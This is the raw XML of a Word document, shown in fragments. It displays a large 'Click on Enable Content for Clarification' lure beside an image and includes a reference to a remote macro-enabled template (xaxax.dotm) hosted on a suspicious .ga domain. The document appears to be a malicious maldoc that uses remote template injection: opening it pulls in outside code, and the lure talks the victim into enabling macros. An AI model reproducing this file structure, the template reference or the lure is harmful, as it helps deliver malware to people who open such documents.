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46880" w14:textId="4AAAB31D" w:rsidR="00A9204E" w:rsidRDefault="00DB504A" w:rsidP="00DB504A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB504A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="002060"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on Enable Content </w:t>
      </w:r>
      <w:r w:rsidR="001B58EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="002060"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB504A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="002060"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Clarification</w:t>
      </w:r>
      <w:r w:rsidR="00ED204B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718F6709" wp14:editId="34EDCB39">
            <wp:extent cx="6571378" cy="7816850"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="A picture containing water, sitting, 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311" cy="7826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2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04B"/>
    <w:rsid w:val="001B58EC"/>
    <w:rsid w:val="00515B83"/>
    <w:rsid w:val="00645252"/>
    <w:rsid w:val="006D3D74"/>
    <w:rsid w:val="0083569A"/>
    <w:rsid w:val="00A9204E"/>
    <w:rsid w:val="00DB504A"/>
    <w:rsid w:val="00ED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24E32"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7B5B9BBA-8303-47F0-9553-8098028E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://moveis-schuster-com.ga/xaxax.dotm?raw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xaxax.dotm?raw=true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 Moha</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-01T04:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-27T11:00:00Z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